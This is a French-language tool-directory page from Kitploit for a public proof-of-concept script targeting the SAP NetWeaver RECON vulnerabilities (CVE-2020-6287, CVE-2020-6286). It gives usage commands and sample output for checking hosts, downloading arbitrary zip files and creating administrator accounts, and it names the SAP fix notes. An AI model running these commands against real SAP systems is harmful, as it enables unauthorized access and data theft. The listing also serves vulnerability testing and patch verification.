Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SAP_RECON — PoC pour CVE-2020-6287, CVE-2020-6286 (vulnérabilité SAP RECON) | Kitploit
Outils/GitHubGitHub/chipik/sap_recon
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubchipik/sap_recon

SAP_RECON

PoC pour CVE-2020-6287, CVE-2020-6286 (vulnérabilité SAP RECON)

Voir le dépôt
223632il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC pour CVE-2020-6287, CVE-2020-6286 (vulnérabilité SAP RECON)

Pffff ! RECON (Remotely Exploitable Code On NetWeaver) ? Les gars, vraiment ? C'est le meilleur nom de code que vous ayez trouvé ? :)

Ce script permet de vérifier la vulnérabilité d'absence de contrôle d'autorisation dans SAP LM Configuration Wizard et, en tant que script PoC, exploite le directory traversal dans la méthode queryProtocol.

Le directory traversal permet de télécharger n'importe quel zip depuis le serveur SAP.

Ce projet est créé uniquement à des fins éducatives et ne peut pas être utilisé pour enfreindre la loi ou pour un gain personnel.
L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les matériaux de ce projet

Découverte initiale :

CVE-2020-6287 : Pablo Artuso
CVE-2020-6286 : Yvan 'iggy' G.

Solution : #2934135, #2939665

Comment utiliser

Indiquez simplement le nom d'hôte/IP de SAP NW AS Java.

Il existe des options supplémentaires :

  1. -c - vérifier si le serveur SAP est vulnérable à RECON
  2. -f - télécharger un fichier zip depuis le serveur SAP
  3. -u - créer un utilisateur SAP JAVA avec le rôle
Télécharger l’outil
Authenticated User
  • -a - créer un utilisateur SAP JAVA avec le rôle Administrator
  • Ex. : Téléchargement d'un fichier zip

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -f /1111.zip
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Ok! File zipfile_929.zip was saved
    

    Ex. : Création d'un utilisateur SAP JAVA

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -u
    Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user. sapRpoc5484:Secure!PwD9379
    Ok! User were created
    

    Ex. : Création d'un utilisateur administrateur SAP JAVA

    root@kitploit:~
    ~python RECON.py -H 172.16.30.8 -a
    Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
    Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
    Ok! Admin user were created
    

    Toutes les options

    root@kitploit:~
    ~python RECON.py -h
    usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
                    [-u] [-a] [--timeout TIMEOUT] [-v]
    
    PoC for CVE-2020-6287,  (RECON)
    This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
    Original finding:
    - Pablo Artuso. https://twitter.com/lmkalg
    - Yvan 'iggy' G https://twitter.com/_1ggy
    
    Thanks:
    - Spencer McIntyre https://twitter.com/zeroSteiner
    
    Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
    
    optional arguments:
      -h, --help            show this help message and exit
      -H HOST, --host HOST  Java NW host (default: 127.0.0.1)
      -P PORT, --port PORT  Java NW web port (default: tcp/50000)
      -p PROXY, --proxy PROXY
                            Use proxy (ex: 127.0.0.1:8080)
      -s, --ssl             enable SSL
      -c, --check           just detect vulnerability
      -f ZIPFILE, --zipfile ZIPFILE
                            ZIP file to read. CVE-2020-6286
      -u, --user            Create simple JAVA user. CVE-2020-6287
      -a, --admin           Create JAVA user with role "Administrator". CVE-2020-6287
      --timeout TIMEOUT     HTTP connection timeout in second (default: 10)
      -v, --verbose         verbose mode